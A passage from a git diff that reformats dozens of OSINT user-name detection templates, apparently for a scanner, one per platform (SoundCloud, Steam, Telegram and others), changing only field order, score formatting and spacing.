was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,social-msdn metadata: max-request: 1 + tags: osint,osint-social,social-msdn self-contained: true + http: - method: GET path: diff --git a/http/osint/socialbundde.yaml b/http/osint/socialbundde.yaml index 9ed8017a12..0d4752b39b 100644 --- a/http/osint/socialbundde.yaml +++ b/http/osint/socialbundde.yaml @@ -3,17 +3,18 @@ id: socialbundde info: name: Social.bund.de User Name Information - Detect author: dwisiswant0 - description: Social.bund.de user name information check was conducted. severity: info + description: Social.bund.de user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,socialbundde metadata: max-request: 1 + tags: osint,osint-social,socialbundde self-contained: true + http: - method: GET path: diff --git a/http/osint/sofurry.yaml b/http/osint/sofurry.yaml index 20f029d674..bda336b05c 100644 --- a/http/osint/sofurry.yaml +++ b/http/osint/sofurry.yaml @@ -3,17 +3,18 @@ id: sofurry info: name: Sofurry User Name Information - Detect author: dwisiswant0 - description: Sofurry user name information check was conducted. severity: info + description: Sofurry user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-art,sofurry metadata: max-request: 1 + tags: osint,osint-art,sofurry self-contained: true + http: - method: GET path: diff --git a/http/osint/solikick.yaml b/http/osint/solikick.yaml index 6a488fde50..827a461236 100644 --- a/http/osint/solikick.yaml +++ b/http/osint/solikick.yaml @@ -3,17 +3,18 @@ id: solikick info: name: SoliKick User Name Information - Detect author: dwisiswant0 - description: SoliKick user name information check was conducted. severity: info + description: SoliKick user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,solikick metadata: max-request: 1 + tags: osint,osint-social,solikick self-contained: true + http: - method: GET path: diff --git a/http/osint/soloby.yaml b/http/osint/soloby.yaml index 622de06824..2b6b83ea35 100644 --- a/http/osint/soloby.yaml +++ b/http/osint/soloby.yaml @@ -3,17 +3,18 @@ id: soloby info: name: Soloby User Name Information - Detect author: dwisiswant0 - description: Soloby user name information check was conducted. severity: info + description: Soloby user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,soloby metadata: max-request: 1 + tags: osint,osint-social,soloby self-contained: true + http: - method: GET path: diff --git a/http/osint/soloto.yaml b/http/osint/soloto.yaml index 6c2c8ae99a..809466762f 100644 --- a/http/osint/soloto.yaml +++ b/http/osint/soloto.yaml @@ -3,17 +3,18 @@ id: soloto info: name: Solo.to User Name Information - Detect author: dwisiswant0 - description: Solo.to user name information check was conducted. severity: info + description: Solo.to user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,soloto metadata: max-request: 1 + tags: osint,osint-social,soloto self-contained: true + http: - method: GET path: diff --git a/http/osint/soundcloud.yaml b/http/osint/soundcloud.yaml index aaa9555bb8..02db6a1408 100644 --- a/http/osint/soundcloud.yaml +++ b/http/osint/soundcloud.yaml @@ -3,17 +3,18 @@ id: soundcloud info: name: SoundCloud User Name Information - Detect author: dwisiswant0 - description: SoundCloud user name information check was conducted. severity: info + description: SoundCloud user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-music,soundcloud metadata: max-request: 1 + tags: osint,osint-music,soundcloud self-contained: true + http: - method: GET path: diff --git a/http/osint/soup.yaml b/http/osint/soup.yaml index 374d34cd24..ab5108dbb2 100644 --- a/http/osint/soup.yaml +++ b/http/osint/soup.yaml @@ -3,17 +3,18 @@ id: soup info: name: Soup User Name Information - Detect author: dwisiswant0 - description: Soup user name information check was conducted. severity: info + description: Soup user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-blog,soup metadata: max-request: 1 + tags: osint,osint-blog,soup self-contained: true + http: - method: GET path: diff --git a/http/osint/sourceforge.yaml b/http/osint/sourceforge.yaml index fe958cf878..abea45ff87 100644 --- a/http/osint/sourceforge.yaml +++ b/http/osint/sourceforge.yaml @@ -3,17 +3,18 @@ id: sourceforge info: name: Sourceforge User Name Information - Detect author: dwisiswant0 - description: Sourceforge user name information check was conducted. severity: info + description: Sourceforge user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-coding,sourceforge metadata: max-request: 1 + tags: osint,osint-coding,sourceforge self-contained: true + http: - method: GET path: diff --git a/http/osint/speaker-deck.yaml b/http/osint/speaker-deck.yaml index e3494c6fe2..bdcdcc72bb 100644 --- a/http/osint/speaker-deck.yaml +++ b/http/osint/speaker-deck.yaml @@ -3,17 +3,18 @@ id: speaker-deck info: name: Speaker Deck User Name Information - Detect author: dwisiswant0 - description: Speaker Deck user name information check was conducted. severity: info + description: Speaker Deck user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,speaker-deck metadata: max-request: 1 + tags: osint,osint-social,speaker-deck self-contained: true + http: - method: GET path: diff --git a/http/osint/speedrun.yaml b/http/osint/speedrun.yaml index e495301f5e..efea6b0845 100644 --- a/http/osint/speedrun.yaml +++ b/http/osint/speedrun.yaml @@ -3,17 +3,18 @@ id: speedrun info: name: Speedrun User Name Information - Detect author: dwisiswant0 - description: Speedrun user name information check was conducted. severity: info + description: Speedrun user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-gaming,speedrun metadata: max-request: 1 + tags: osint,osint-gaming,speedrun self-contained: true + http: - method: GET path: diff --git a/http/osint/spiceworks.yaml b/http/osint/spiceworks.yaml index e942f2a766..fc0a3d5ac3 100644 --- a/http/osint/spiceworks.yaml +++ b/http/osint/spiceworks.yaml @@ -3,17 +3,18 @@ id: spiceworks info: name: SpiceWorks User Name Information - Detect author: dwisiswant0 - description: SpiceWorks user name information check was conducted. severity: info + description: SpiceWorks user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-tech,spiceworks metadata: max-request: 1 + tags: osint,osint-tech,spiceworks self-contained: true + http: - method: GET path: diff --git a/http/osint/sporcle.yaml b/http/osint/sporcle.yaml index e2ea489835..18411c95ac 100644 --- a/http/osint/sporcle.yaml +++ b/http/osint/sporcle.yaml @@ -3,17 +3,18 @@ id: sporcle info: name: Sporcle User Name Information - Detect author: dwisiswant0 - description: Sporcle user name information check was conducted. severity: info + description: Sporcle user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-gaming,sporcle metadata: max-request: 1 + tags: osint,osint-gaming,sporcle self-contained: true + http: - method: GET path: diff --git a/http/osint/spotify.yaml b/http/osint/spotify.yaml index 53d4dedbb1..61772c7acb 100644 --- a/http/osint/spotify.yaml +++ b/http/osint/spotify.yaml @@ -3,17 +3,18 @@ id: spotify info: name: Spotify User Name Information - Detect author: dwisiswant0 - description: Spotify user name information check was conducted. severity: info + description: Spotify user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-music,spotify metadata: max-request: 1 + tags: osint,osint-music,spotify self-contained: true + http: - method: GET path: diff --git a/http/osint/stackoverflow.yaml b/http/osint/stackoverflow.yaml index c9856ec2f4..f14f36dfa3 100644 --- a/http/osint/stackoverflow.yaml +++ b/http/osint/stackoverflow.yaml @@ -10,11 +10,12 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - max-request: 1 verified: "true" + max-request: 1 tags: osint,osint-coding,stackoverflow self-contained: true + http: - method: GET path: diff --git a/http/osint/steam.yaml b/http/osint/steam.yaml index 06f9e7ae18..75873bc714 100644 --- a/http/osint/steam.yaml +++ b/http/osint/steam.yaml @@ -3,17 +3,18 @@ id: steam info: name: Steam User Name Information - Detect author: dwisiswant0 - description: Steam user name information check was conducted. severity: info + description: Steam user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-gaming,steam metadata: max-request: 1 + tags: osint,osint-gaming,steam self-contained: true + http: - method: GET path: diff --git a/http/osint/steemit.yaml b/http/osint/steemit.yaml index a94e748990..49e631a2c6 100644 --- a/http/osint/steemit.yaml +++ b/http/osint/steemit.yaml @@ -3,17 +3,18 @@ id: steemit info: name: Steemit User Name Information - Detect author: dwisiswant0 - description: Steemit user name information check was conducted. severity: info + description: Steemit user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,steemit metadata: max-request: 1 + tags: osint,osint-social,steemit self-contained: true + http: - method: GET path: diff --git a/http/osint/steller.yaml b/http/osint/steller.yaml index e590fafc08..70098e05a4 100644 --- a/http/osint/steller.yaml +++ b/http/osint/steller.yaml @@ -3,17 +3,18 @@ id: steller info: name: Steller User Name Information - Detect author: dwisiswant0 - description: Steller user name information check was conducted. severity: info + description: Steller user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-shopping,steller metadata: max-request: 1 + tags: osint,osint-shopping,steller self-contained: true + http: - method: GET path: diff --git a/http/osint/stonerssocial-mastodon-instance.yaml b/http/osint/stonerssocial-mastodon-instance.yaml index 142497f682..301472d697 100644 --- a/http/osint/stonerssocial-mastodon-instance.yaml +++ b/http/osint/stonerssocial-mastodon-instance.yaml @@ -3,17 +3,18 @@ id: stonerssocial-mastodon-instance info: name: Stoners.social (Mastodon Instance) User Name Information - Detect author: dwisiswant0 - description: Stoners.social (Mastodon Instance) user name information check was conducted. severity: info + description: Stoners.social (Mastodon Instance) user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,stonerssocial-mastodon-instance metadata: max-request: 1 + tags: osint,osint-social,stonerssocial-mastodon-instance self-contained: true + http: - method: GET path: diff --git a/http/osint/storycorps.yaml b/http/osint/storycorps.yaml index 9d59d7f1dd..6bacabcca0 100644 --- a/http/osint/storycorps.yaml +++ b/http/osint/storycorps.yaml @@ -3,17 +3,18 @@ id: storycorps info: name: StoryCorps User Name Information - Detect author: dwisiswant0 - description: StoryCorps user name information check was conducted. severity: info + description: StoryCorps user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-blog,storycorps metadata: max-request: 1 + tags: osint,osint-blog,storycorps self-contained: true + http: - method: GET path: diff --git a/http/osint/streamelements.yaml b/http/osint/streamelements.yaml index 7ae47f8a2f..60007ed463 100644 --- a/http/osint/streamelements.yaml +++ b/http/osint/streamelements.yaml @@ -3,17 +3,18 @@ id: streamelements info: name: StreamElements User Name Information - Detect author: dwisiswant0 - description: StreamElements user name information check was conducted. severity: info + description: StreamElements user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-finance,streamelements metadata: max-request: 1 + tags: osint,osint-finance,streamelements self-contained: true + http: - method: GET path: diff --git a/http/osint/streamlabs.yaml b/http/osint/streamlabs.yaml index 0b2338ff1f..8193f5f029 100644 --- a/http/osint/streamlabs.yaml +++ b/http/osint/streamlabs.yaml @@ -3,17 +3,18 @@ id: streamlabs info: name: StreamLabs User Name Information - Detect author: dwisiswant0 - description: StreamLabs user name information check was conducted. severity: info + description: StreamLabs user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-finance,streamlabs metadata: max-request: 1 + tags: osint,osint-finance,streamlabs self-contained: true + http: - method: GET path: diff --git a/http/osint/stripchat.yaml b/http/osint/stripchat.yaml index 2ccfe7b725..ca30a2983f 100644 --- a/http/osint/stripchat.yaml +++ b/http/osint/stripchat.yaml @@ -3,17 +3,18 @@ id: stripchat info: name: Stripchat User Name Information - Detect author: dwisiswant0 - description: Stripchat user name information check was conducted. severity: info + description: Stripchat user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-porn,stripchat metadata: max-request: 1 + tags: osint,osint-porn,stripchat self-contained: true + http: - method: GET path: diff --git a/http/osint/subscribestar.yaml b/http/osint/subscribestar.yaml index a0f754973f..5fa0ef9f8f 100644 --- a/http/osint/subscribestar.yaml +++ b/http/osint/subscribestar.yaml @@ -3,17 +3,18 @@ id: subscribestar info: name: Subscribestar User Name Information - Detect author: dwisiswant0 - description: Subscribestar user name information check was conducted. severity: info + description: Subscribestar user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-porn,subscribestar metadata: max-request: 1 + tags: osint,osint-porn,subscribestar self-contained: true + http: - method: GET path: diff --git a/http/osint/sukebeinyaasi.yaml b/http/osint/sukebeinyaasi.yaml index a6a61c3167..f8332a382d 100644 --- a/http/osint/sukebeinyaasi.yaml +++ b/http/osint/sukebeinyaasi.yaml @@ -3,17 +3,18 @@ id: sukebeinyaasi info: name: Sukebei.nyaa.si User Name Information - Detect author: dwisiswant0 - description: Sukebei.nyaa.si user name information check was conducted. severity: info + description: Sukebei.nyaa.si user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-video,sukebeinyaasi metadata: max-request: 1 + tags: osint,osint-video,sukebeinyaasi self-contained: true + http: - method: GET path: diff --git a/http/osint/suzuri.yaml b/http/osint/suzuri.yaml index d53f1e0ec8..6fa7315d4e 100644 --- a/http/osint/suzuri.yaml +++ b/http/osint/suzuri.yaml @@ -3,17 +3,18 @@ id: suzuri info: name: Suzuri User Name Information - Detect author: dwisiswant0 - description: Suzuri user name information check was conducted. severity: info + description: Suzuri user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-business,suzuri metadata: max-request: 1 + tags: osint,osint-business,suzuri self-contained: true + http: - method: GET path: diff --git a/http/osint/szmerinfo.yaml b/http/osint/szmerinfo.yaml index 8471e35be6..38a1e1cdd5 100644 --- a/http/osint/szmerinfo.yaml +++ b/http/osint/szmerinfo.yaml @@ -3,17 +3,18 @@ id: szmerinfo info: name: Szmer.info User Name Information - Detect author: dwisiswant0 - description: Szmer.info user name information check was conducted. severity: info + description: Szmer.info user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,szmerinfo metadata: max-request: 1 + tags: osint,osint-social,szmerinfo self-contained: true + http: - method: GET path: diff --git a/http/osint/tabletoptournament.yaml b/http/osint/tabletoptournament.yaml index dee8d6e471..9530f4e968 100644 --- a/http/osint/tabletoptournament.yaml +++ b/http/osint/tabletoptournament.yaml @@ -3,17 +3,18 @@ id: tabletoptournament info: name: Tabletoptournament User Name Information - Detect author: dwisiswant0 - description: Tabletoptournament user name information check was conducted. severity: info + description: Tabletoptournament user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-misc,tabletoptournament metadata: max-request: 1 + tags: osint,osint-misc,tabletoptournament self-contained: true + http: - method: GET path: diff --git a/http/osint/tagged.yaml b/http/osint/tagged.yaml index 1ba57b54e0..9824849c29 100644 --- a/http/osint/tagged.yaml +++ b/http/osint/tagged.yaml @@ -3,17 +3,18 @@ id: tagged info: name: Tagged User Name Information - Detect author: dwisiswant0 - description: Tagged user name information check was conducted. severity: info + description: Tagged user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,tagged metadata: max-request: 1 + tags: osint,osint-social,tagged self-contained: true + http: - method: GET path: diff --git a/http/osint/tamtam.yaml b/http/osint/tamtam.yaml index b61081483e..a4b8b108dc 100644 --- a/http/osint/tamtam.yaml +++ b/http/osint/tamtam.yaml @@ -3,17 +3,18 @@ id: tamtam info: name: TamTam User Name Information - Detect author: dwisiswant0 - description: TamTam user name information check was conducted. severity: info + description: TamTam user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,tamtam metadata: max-request: 1 + tags: osint,osint-social,tamtam self-contained: true + http: - method: GET path: diff --git a/http/osint/tanukipl.yaml b/http/osint/tanukipl.yaml index 564fd6a588..111ade9329 100644 --- a/http/osint/tanukipl.yaml +++ b/http/osint/tanukipl.yaml @@ -3,17 +3,18 @@ id: tanukipl info: name: Tanuki.pl User Name Information - Detect author: dwisiswant0 - description: Tanuki.pl user name information check was conducted. severity: info + description: Tanuki.pl user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-hobby,tanukipl metadata: max-request: 1 + tags: osint,osint-hobby,tanukipl self-contained: true + http: - method: GET path: diff --git a/http/osint/tapitag.yaml b/http/osint/tapitag.yaml index 38ab6385f4..8cac47a538 100644 --- a/http/osint/tapitag.yaml +++ b/http/osint/tapitag.yaml @@ -3,17 +3,18 @@ id: tapitag info: name: TAPiTAG User Name Information - Detect author: dwisiswant0 - description: TAPiTAG user name information check was conducted. severity: info + description: TAPiTAG user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-business,tapitag metadata: max-request: 1 + tags: osint,osint-business,tapitag self-contained: true + http: - method: GET path: diff --git a/http/osint/tappy.yaml b/http/osint/tappy.yaml index 36b1b3325e..0f3e87611d 100644 --- a/http/osint/tappy.yaml +++ b/http/osint/tappy.yaml @@ -3,17 +3,18 @@ id: tappy info: name: Tappy User Name Information - Detect author: dwisiswant0 - description: Tappy user name information check was conducted. severity: info + description: Tappy user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-business,tappy metadata: max-request: 1 + tags: osint,osint-business,tappy self-contained: true + http: - method: GET path: diff --git a/http/osint/taringa.yaml b/http/osint/taringa.yaml index 05db69b42b..29cb1a16ef 100644 --- a/http/osint/taringa.yaml +++ b/http/osint/taringa.yaml @@ -3,17 +3,18 @@ id: taringa info: name: Taringa User Name Information - Detect author: dwisiswant0 - description: Taringa user name information check was conducted. severity: info + description: Taringa user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,taringa metadata: max-request: 1 + tags: osint,osint-social,taringa self-contained: true + http: - method: GET path: diff --git a/http/osint/taskrabbit.yaml b/http/osint/taskrabbit.yaml index 8410056a0e..ec4f1ebcce 100644 --- a/http/osint/taskrabbit.yaml +++ b/http/osint/taskrabbit.yaml @@ -3,17 +3,18 @@ id: taskrabbit info: name: Taskrabbit User Name Information - Detect author: dwisiswant0 - description: Taskrabbit user name information check was conducted. severity: info + description: Taskrabbit user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-business,taskrabbit metadata: max-request: 1 + tags: osint,osint-business,taskrabbit self-contained: true + http: - method: GET path: diff --git a/http/osint/teamtreehouse.yaml b/http/osint/teamtreehouse.yaml index 29ef857ad3..aaba346ed3 100644 --- a/http/osint/teamtreehouse.yaml +++ b/http/osint/teamtreehouse.yaml @@ -3,17 +3,18 @@ id: teamtreehouse info: name: Teamtreehouse User Name Information - Detect author: dwisiswant0 - description: Teamtreehouse user name information check was conducted. severity: info + description: Teamtreehouse user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-coding,teamtreehouse metadata: max-request: 1 + tags: osint,osint-coding,teamtreehouse self-contained: true + http: - method: GET path: diff --git a/http/osint/teddygirls.yaml b/http/osint/teddygirls.yaml index 91f1cd1338..df804ee82f 100644 --- a/http/osint/teddygirls.yaml +++ b/http/osint/teddygirls.yaml @@ -3,17 +3,18 @@ id: teddygirls info: name: Teddygirls User Name Information - Detect author: dwisiswant0 - description: Teddygirls user name information check was conducted. severity: info + description: Teddygirls user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-porn,teddygirls metadata: max-request: 1 + tags: osint,osint-porn,teddygirls self-contained: true + http: - method: GET path: diff --git a/http/osint/teespring.yaml b/http/osint/teespring.yaml index 30f43e5200..0a2a220ca3 100644 --- a/http/osint/teespring.yaml +++ b/http/osint/teespring.yaml @@ -3,17 +3,18 @@ id: teespring info: name: Teespring User Name Information - Detect author: dwisiswant0 - description: Teespring user name information check was conducted. severity: info + description: Teespring user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-business,teespring metadata: max-request: 1 + tags: osint,osint-business,teespring self-contained: true + http: - method: GET path: diff --git a/http/osint/teknik.yaml b/http/osint/teknik.yaml index 8d22f435f6..3505e2a726 100644 --- a/http/osint/teknik.yaml +++ b/http/osint/teknik.yaml @@ -3,17 +3,18 @@ id: teknik info: name: Teknik User Name Information - Detect author: dwisiswant0 - description: Teknik user name information check was conducted. severity: info + description: Teknik user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-tech,teknik metadata: max-request: 1 + tags: osint,osint-tech,teknik self-contained: true + http: - method: GET path: diff --git a/http/osint/telegram.yaml b/http/osint/telegram.yaml index d9be1e6650..efaace72dc 100644 --- a/http/osint/telegram.yaml +++ b/http/osint/telegram.yaml @@ -3,17 +3,18 @@ id: telegram info: name: Telegram User Name Information - Detect author: dwisiswant0 - description: Telegram user name information check was conducted. severity: info + description: Telegram user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,telegram metadata: max-request: 1 + tags: osint,osint-social,telegram self-contained: true + http: - method: GET path: diff --git a/http/osint/tellonym.yaml b/http/osint/tellonym.yaml index f49dc4b96e..94da95bea8 100644 --- a/http/osint/tellonym.yaml +++ b/http/osint/tellonym.yaml @@ -3,17 +3,18 @@ id: tellonym info: name: Tellonym User Name Information - Detect author: dwisiswant0 - description: Tellonym user name information check was conducted. severity: info + description: Tellonym user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,tellonym metadata: max-request: 1 + tags: osint,osint-social,tellonym self-contained: true + http: - method: GET path: diff --git a/http/osint/tenor.yaml b/http/osint/tenor.yaml index 9fb0f6269f..f05f9cd6d0 100644 --- a/http/osint/tenor.yaml +++ b/http/osint/tenor.yaml @@ -3,17 +3,18 @@ id: tenor info: name: Tenor User Name Information - Detect author: dwisiswant0 - description: Tenor user name information check was conducted. severity: info + description: Tenor user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-images,tenor metadata: max-request: 1 + tags: osint,osint-images,tenor self-contained: true + http: - method: GET path: diff --git a/http/osint/tf2-backpack-examiner.yaml b/http/osint/tf2-backpack-examiner.yaml index 7ccbf76a3e..12769ac19b 100644 --- a/http/osint/tf2-backpack-examiner.yaml +++ b/http/osint/tf2-backpack-examiner.yaml @@ -3,17 +3,18 @@ id: tf2-backpack-examiner info: name: TF2 Backpack Examiner User Name Information - Detect author: dwisiswant0 - description: TF2 Backpack Examiner user name information check was conducted. severity: info + description: TF2 Backpack Examiner user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-gaming,tf2-backpack-examiner metadata: max-request: 1 + tags: osint,osint-gaming,tf2-backpack-examiner self-contained: true + http: - method: GET path: diff --git a/http/osint/thegatewaypundit.yaml b/http/osint/thegatewaypundit.yaml index 21c3ad8aed..d8801fc1d0 100644 --- a/http/osint/thegatewaypundit.yaml +++ b/http/osint/thegatewaypundit.yaml @@ -3,17 +3,18 @@ id: thegatewaypundit info: name: Thegatewaypundit User Name Information - Detect author: dwisiswant0 - description: Thegatewaypundit user name information check was conducted. severity: info + description: Thegatewaypundit user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-political,thegatewaypundit metadata: max-request: 1 + tags: osint,osint-political,thegatewaypundit self-contained: true + http: - method: GET path: diff --git a/http/osint/theguardian.yaml b/http/osint/theguardian.yaml index e50a2e8a20..0a28cc6057 100644 --- a/http/osint/theguardian.yaml +++ b/http/osint/theguardian.yaml @@ -3,17 +3,18 @@ id: theguardian info: name: Theguardian User Name Information - Detect author: dwisiswant0 - description: Theguardian user name information check was conducted. severity: info + description: Theguardian user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-news,theguardian metadata: max-request: 1 + tags: osint,osint-news,theguardian self-contained: true + http: - method: GET path: diff --git a/http/osint/themeforest.yaml b/http/osint/themeforest.yaml index cbee46fde6..0c330c6fa6 100644 --- a/http/osint/themeforest.yaml +++ b/http/osint/themeforest.yaml @@ -3,17 +3,18 @@ id: themeforest info: name: Themeforest User Name Information - Detect author: dwisiswant0 - description: Themeforest user name information check was conducted. severity: info + description: Themeforest user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 